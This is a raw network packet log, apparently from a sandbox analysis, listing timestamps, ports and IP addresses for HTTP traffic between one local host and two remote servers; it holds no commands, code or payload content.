Jan 7, 2025 13:25:01.751261950 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.751324892 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.751344919 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.751363039 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.751374006 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.751418114 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.751430035 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.751431942 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.751442909 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.751461029 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.751506090 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.751533985 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.751698017 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.751746893 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.751758099 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.751811028 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.751821995 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.751830101 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.751837015 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.751863956 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.751873970 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.751878023 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.751894951 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.751940012 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.760234118 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.760246038 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.760313988 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.760324955 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.760333061 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.760335922 CET	80	49710	147.124.216.113	192.168.2.5
Jan 7, 2025 13:25:01.760390997 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:01.805706978 CET	49710	80	192.168.2.5	147.124.216.113
Jan 7, 2025 13:25:02.327433109 CET	49716	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:02.332314968 CET	80	49716	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:02.332407951 CET	49716	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:02.332518101 CET	49716	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:02.337335110 CET	80	49716	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:02.337390900 CET	49716	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:02.426265001 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:02.431096077 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:02.431195974 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:02.446954966 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:02.451801062 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.439518929 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.439539909 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.439553022 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.439563990 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.439577103 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.439588070 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.439608097 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:03.439667940 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.439670086 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:03.439713001 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.439723969 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.439754009 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:03.439779043 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.439817905 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:03.444482088 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.444494009 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.444504976 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.444516897 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.444572926 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:03.444613934 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:03.707807064 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.707825899 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.707839966 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.707854033 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.707875967 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.707879066 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:03.707931995 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:03.708487034 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.708523035 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.708534002 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.708553076 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:03.708559990 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.708575010 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.708606958 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:03.708641052 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:03.708873987 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.708884954 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.708898067 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.708908081 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.708919048 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:03.708946943 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:03.709355116 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.709381104 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.709429026 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:03.710194111 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.710244894 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.710256100 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.710304022 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:03.712804079 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.712863922 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:03.712894917 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.712905884 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.712919950 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.712930918 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.712941885 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:03.712944984 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.712987900 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:03.713222980 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.713246107 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.713269949 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:03.762571096 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:03.974173069 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.974205971 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.974220037 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.974231958 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.974244118 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.974261999 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.974273920 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.974276066 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:03.974284887 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.974340916 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:03.974459887 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.974487066 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.974498987 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.974534988 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.974554062 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:03.974595070 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:03.974765062 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.974782944 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.974824905 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.974827051 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:03.974919081 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.974930048 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.974940062 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.974972963 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:03.974997044 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:03.975138903 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.975148916 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.975189924 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:03.976389885 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.976402998 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.976413965 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.976440907 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:03.976475000 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.976485968 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.976495981 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.976521015 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:03.976551056 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:03.976825953 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.976851940 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.976861954 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.976888895 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:03.976933956 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.976957083 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.976972103 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:03.977001905 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.977034092 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.977088928 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:03.978120089 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.978132963 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.978143930 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.978177071 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:03.978199959 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:03.978209972 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.978221893 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.978230953 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.978257895 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:03.979049921 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.979068995 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.979085922 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.979104996 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.979113102 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:03.979136944 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:03.979173899 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.979183912 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.979223967 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:03.979275942 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.979336977 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.979351997 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.979373932 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.979383945 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.979393959 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:03.979424953 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:03.979562998 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.979573011 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.979583979 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.979615927 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:03.979742050 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.979753971 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.979763031 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.979790926 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:03.979811907 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:03.979911089 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.979938030 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.979949951 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.979993105 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.979995966 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:03.980004072 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:03.980030060 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.032757044 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.239857912 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.239876032 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.239888906 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.239902973 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.239917040 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.239962101 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.240139008 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.240155935 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.240169048 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.240195990 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.240221977 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.240293980 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.240307093 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.240318060 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.240330935 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.240343094 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.240348101 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.240354061 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.240361929 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.240366936 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.240403891 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.240458012 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.240472078 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.240520000 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.240629911 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.240643024 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.240653992 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.240664005 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.240667105 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.240678072 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.240688086 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.240731001 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.240775108 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.240787983 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.240798950 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.240825891 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.240912914 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.240926027 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.240936995 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.240942955 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.240953922 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.240959883 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.240969896 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.241003990 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.241080046 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.241091013 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.241110086 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.241122007 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.241132021 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.241251945 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.241261005 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.241899014 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.241914034 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.241925955 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.241969109 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.242064953 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.242074966 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.242086887 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.242096901 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.242111921 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.242130995 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.242203951 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.242214918 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.242250919 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.242374897 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.242386103 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.242396116 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.242407084 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.242417097 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.242419958 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.242443085 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.242547035 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.242558002 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.242568016 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.242594004 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.242611885 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.244915009 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.244934082 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.244945049 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.244970083 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.245019913 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.245038033 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.245050907 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.245064020 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.245064974 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.245085001 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.245089054 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.245100021 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.245131969 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.245131969 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.245143890 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.245156050 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.245167017 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.245177984 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.245192051 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.245197058 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.245204926 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.245249033 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.245402098 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.245423079 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.245429039 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.245461941 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.245465040 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.245476007 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.245536089 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.245609999 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.245620966 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.245630980 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.245656013 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.245696068 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.245707035 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.245718002 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.245729923 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.245739937 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.245743036 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.245774031 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.245790958 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.245862961 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.245919943 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.245930910 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.245964050 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.245978117 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.245990038 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.246002913 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.246015072 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.246023893 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.246032000 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.246058941 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.246068954 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.329777002 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.329793930 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.329804897 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.329830885 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.329843044 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.329854012 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.329864979 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.329895973 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.329911947 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.329917908 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.329932928 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.329936981 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.329945087 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.329957008 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.329960108 CET	49717	80	192.168.2.5	166.62.27.188
Jan 7, 2025 13:25:04.329992056 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.330017090 CET	80	49717	166.62.27.188	192.168.2.5
Jan 7, 2025 13:25:04.330019951 CET	49717	80	192.168.2.5	166.62.27.188
